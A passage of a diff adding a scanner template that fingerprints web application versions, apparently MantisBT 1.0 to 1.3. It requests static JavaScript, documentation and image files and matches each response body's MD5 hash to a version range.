"(\"6c8b2fda6bc7b451899c73a4a5c898c4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/time_tracking_stopwatch.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"c9d14d0f20929e690fe083a856f3e7ed\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/ajax.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"39134f65ab3f98920917f026765fb8f3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/common.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"8c567a7959d10844b935f80e480842c3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/xmlhttprequest.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"5332526d23955b3e3dff840711f3d494\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/dynamic_filters.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"788a119f04305728953ea6685c8bc90b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/addLoadEvent.js" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"c4ac12c0570ab4d9ff2f1865e5cc9358\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"6ebfcc65439139d09bbc818c0435e840\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"7d03fac871de1942c0b0beb7fb9f5489\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e9ced3caf3bd6526aee6ba18660cd59b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"d269c970093fb15cea9ce70f6b2153eb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/builder.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"fab777049e97ff23d992c0f9df6fe7af\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/prototype.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"0b6e13d98a62152483f771c3f4ef337e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/effects.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"7b54098c8b5e58849b613fbc93fdd80a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/prototype_b.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"561bacbdd049a9137c854b02a881923d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/scriptaculous.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"05af88c2c6963028de769f281b16d729\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/license.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"833423bd99b3d322db8e86d779eaa21d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/slider.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"0832e1ff1697bda772909815b6ee1ab5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/dragdrop.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"c5581bf86657295a26d0a2a6f23a752b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/MIT-LICENSE" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"644476df73032b063a33b199a3003fd8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/controls.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"78a3557031d104d09e8429350bf69575\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/jscalendar/lang/calendar-en.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"46811ee79796d2345bea2308475d1ec9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/jscalendar/calendar.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"752290970024c54c4b41a3145e3e0bce\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/jscalendar/calendar-blue.css" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"7c561519a1cf3a882e27d1b9814888d4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/jscalendar/calendar-setup.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"e8fa1ddbee7987135472abefa8132693\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/time_tracking_stopwatch.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"19af4f932c37186c750b644fdfc2e5d8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/ajax.js" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"f0d344ccfd41296ba7863529535a1c05\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"f7bb7a98908c339868cf8afd94e77157\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"262af3ff0b422b7140f65b5e950fc326\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"dded62088ca97fbe92e76d2b191230bb\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"cf93193fdb19340b2abec3339a41cb13\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/xmlhttprequest.js" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"924dfb284c6b096ca9251dd7ca49569c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e4410a0f1d0e5a5335e0a3e88a6c46e6\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"51a4d09bf77643e51b5823a4336895c1\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"952263942c0997e2c15e0457a4f3f33c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"bbf3fbb8068df16f0901334953df3625\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/dynamic_filters.js" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"d7fb2a1ed2d163f7137d368b6b4a77ee\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"68304ec3e9e322b1672cbae412bb1eed\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"c477e0e7dcdf9ef3be17aa71135630dc\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5db8bc2031ac54f300b46ab22871e1cb\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"ee4ee4e8902e612f5721845b27273683\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/CUSTOMIZATION" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"69ed7d7b096557122c1b5e7817ed9187\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"fb5eed653dc8a0269228021690f93de9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"9a40b9f4b6213237958db2258a1b511b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8a95c4bac722cd794e619e80a8dba49a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"b1240a98523c88f9b793f6c63303de83\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"9236cf0c0221809bbcfff18c6c77e615\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"03245342745fe4a044fd2e18dc608a4f\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"d6d0e727b9c9eeaf428ff5a3989d6f08\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/admin/admin.css" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"ed352d1826d9c69f69a55493ae7151a7\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"bbd184dcfe906ea96aa8c84d62dc4716\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/template/Makefile" + + matchers: + - type: dsl + name: 1.2.7 - 1.2.20 + dsl: + - "(\"b389a203fa54197c83472034b2a83b93\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.6 + dsl: + - "(\"bdbe14a14039da0f3764dd6a9232860b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/template/chapter.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"668b74a870980313f9ca9cc911f02045\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/template/template.sgml" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"c71dc5406ca9f69b860c7b089f7226d1\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"c699033cdfb7a287a858a2fd9f3fcaa3\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"230d83d634a1b155b410e5dbdf702282\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1499c35c2d45ae04ebfda958224f9524\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"5c0d378a62749da5f924d045a2184c70\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/template/stylesheet.css" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"35e977810bc6fa8b11b4f8c6dd6e7cf5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/template/file-entities.ent" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"e1c3a4aff2e0bd94167c3b25af2ca161\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/template/stylesheet.dsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"abd9f15781c41ec01ed386a46e31cff4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/integrators.sgml" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"d6109aa0cd02433061331bea9e4f39c6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-bug.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.11 + dsl: + - "(\"789ae9794b72a5cfb5d6e859e36a53b5\" == md5(body))" + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - "(\"0d353c9756f97a3834d97bcc82ad30a6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/developers.sgml" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"e2748bd8fd249eb41eb88f8e22d796d6\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"391d00a19e96309aa15806ef1b43faec\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"3d0c60bcfd37c6bf225b051fc37d931e\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a0290c0935ac9bdb31f34401af60abef\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"ea51d3d489cce0d5cf9f0cae5e66cd07\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/Makefile" + + matchers: + - type: dsl + name: 1.2.7 - 1.2.15 + dsl: + - "(\"3ac33befa28ae4366b733718bee7e126\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.6 + dsl: + - "(\"18d6d73c6795a241920f779da97563f0\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"54e4d30fbe8589422681182442dac0cc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/appendix.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"e9d6c068a8ed1abe41b468a25ea123fb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/plugins-building-source.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"645c4576a7445c96e1145ea5b0a0a504\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/database.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"b17dd9b5effb4b229e56aeed5bdc4520\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"b594792b1d736c60435cb5f9ca0e306f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/contributers.sgml" + + matchers: + - type: dsl + name: 1.2.6 - 1.2.15 + dsl: + - "(\"21c96efc1675c7331acac10ee4052eb3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.5 + dsl: + - "(\"5ed2c4180ad2a4f3568b6173c402ef8c\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"9697b60be1ac11e17cbcae2edce84c65\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"2acfe92a8662fccbd8f565dadde74917\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/plugins-building.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"238875281a0e62e9a87269bb815e7af5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/file-entities.ent" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"81e865039656fca103cdab244b20a36f\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.8 + dsl: + - "(\"a5c63951fd54afa34db3b5339bc6d1dc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/events.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"771c1f8d28e63cfe5214707b33e4f357\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-filter.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d5751664e41a79c67be6348f879a51bf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-notify.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"dce82ad029a186c7f8289f6069f1a5f9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/plugins.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"9e2ddd16927c938ce32ff57434bf1b53\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/README" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.15 + dsl: + - "(\"d4e825abfad93dbd2a5286363868e986\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"7aa8917cb958a65447c5d684f09ccc20\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/page_descriptions.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"d2a41796705e0fd14ea660ca72652fe3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/Makefile" + + matchers: + - type: dsl + name: 1.2.7 - 1.2.10 + dsl: + - "(\"1ef4671f58e0f5e8e618543af45b2cf4\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.6 + dsl: + - "(\"7c296c5def3beac5ce972924b6fac829\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/project_management.sgml" + + matchers: + - type: dsl + name: 1.2.4 - 1.2.10 + dsl: + - "(\"79d8ce09a4cfdad0c3dab14f86dde4d3\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.3 + dsl: + - "(\"4bee948af824d0886d3a8dc9e7450418\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/user_management.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"9898f7e63e46f44f4e8f6bbd2f0932fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/workflow.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"862957ebabe5dbc719d029bec5659369\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/authentication.sgml" + + matchers: + - type: dsl + name: 1.2.6 - 1.2.10 + dsl: + - "(\"50141a26d26acfd92e5dd99cd77d8047\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.5 + dsl: + - "(\"21226f78a94a6763ffaecb2f3d3de212\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/administration_guide.sgml" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"c4bc2ea427d728ea5b6e1ed4a938c882\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"010eff7b8ff9852029621b62e538464b\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"c3ce9ad3c175a8ee4e1fa52b7818b18f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/file-entities.ent" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"05becfb68387aad85228e6aef09cd6ba\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/installation.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"fa17bba464761637cabe3c11e62f5513\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/contributing.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"7eca1a0d02dd400081050a7f1397255e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/customizing_mantis.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"1ea3feac2fa52a53d2f330a3d5a07de7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/about.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"58a5a80735b83b5ba3b8352b2bc7726a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/build.xml" + + matchers: + - type: dsl + name: 1.2.7 - 1.2.20 + dsl: + - "(\"90e4a9acc1a738d805f4f51dee088cbf\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.6 + dsl: + - "(\"da1ea1cebab683fadfb4a0d9a9be48d1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/ezc/Makefile" + + matchers: + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"9f71a5c571ce306126a4d8664c2eaa50\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/ie.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"800d2395bd737075d8e67779d304d3e5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_low_3.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"0f43345070da1403d4adcf3ddf7c87d2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/dollars.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"6fc74458f291407bc3e504d313b9b075\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_normal.gif" + + matchers: + - type: dsl + name: 1.2.0 - 1.3.20 + dsl: + - "(\"e5152b80ee76e25679f810536067fbb0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/minus.png" + + matchers: + - type: dsl + name: 1.2.9 - 1.3.20 + dsl: + - "(\"d2b6371450be3211332ed12015da2592\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.2.8 + dsl: + - "(\"b323f1eb57100ca529be46a51b453406\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_1.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"34eb51f026f5c827462aa1f8acedefc1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/protected.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"8e5ab56d1413fe3e1cd3c0a6d1a15e54\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/calendar-img.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"c1e5255bd358fcd5a0779a0cc310a2fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/text.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"f3fa1d34ae216911d245672e3db9235b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/doc.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"31f4faaa0dd89d7f28fcf1ba068437f3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/xlt.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"042a3df7803993ffbe7ef998f27b3340\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/css.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"7b67911906d4ddd3aea8b76c5b88c3b6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/xls.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"d8b116d5a73fb9576799264d6a073396\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/vsd.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"6ab21bd81939304b406e3b7ef20ddd15\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/generic.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"a8cde8384a414838f99be196e53ae039\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/eml.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"bf4b1d2d046d52fcd99fdad878cdebd3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/csv.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"e34fb7975ace474da255d36cbb495835\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/png.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"4c2b6a95930efc2a58c99c87aca61851\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/html.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"338ca0065c22f2a9f699a46c5bf1e7ab\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/pot.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"48c9bdd29e767862dc3b7e395628cb64\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/reg.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"f88d438d411d90e7110017640704c278\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/pub.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"4d964954644c901a851118904070aa2d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/vst.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"7edb963e5addbfae478ee524455492be\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/pdf.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"9cb8ae8481d24743d57e81a2280ffaae\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/mhtml.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"220331690a42d855157a50e634d42835\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/jpg.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"330542d19122885a098aec151a68609a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/unknown.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"b7ea9920fbf16b2d10b36b5d6c47a440\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/mov.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"6fcb0e622a8cef4a1f8f6c6ca4bfadb3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/xml.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"51e2f6426802e24b6714717e9ef7d2e0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/vsl.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"b8732343f4d52883c66ca056b4653fba\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/chm.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"df841fd2cfd2e48a98dba87328917d84\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/gif.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"b67bed81d8bbea1e5590547ef85e1aa0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/one.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"90ef7330debcc3876fdfa911f1584c15\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/pcx.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"d265f3e0fdd2704e6b9cf3f36a37e608\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/pps.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"0810422411d20b8b86edcf6f39e0a8dc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/zip.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"e47b673f360c57be8437841fdea7351c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/wbk.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"5b604a3720ebe9a7841839bd7ae7b13e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/wav.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"6d510113f7b70e42ae9348e70db1c688\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/mid.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"b42cfd563a3d58f03fb03731ac80dbd9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/wri.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"5794fdc184e601e4fa356d664fb095b0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/ppt.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"0388af2462a134559b884ff4a83e7c4f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/cpp.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"7b06d75842a7b7682090a976eecb01aa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/down.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"ea5126235fb9549dd9eda38f13120763\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/plus.png" + + matchers: + - type: dsl + name: 1.2.9 - 1.3.20 + dsl: + - "(\"423617ed0d546823d454457e4e6c3964\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.2.8 + dsl: + - "(\"3c4813c2af6298af8eaacab2f0bd7b58\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/attachment.png" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"16f808ec5ec9e0c9bb8fa2eca2e9eb9e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/update.png" + + matchers: + - type: dsl + name: 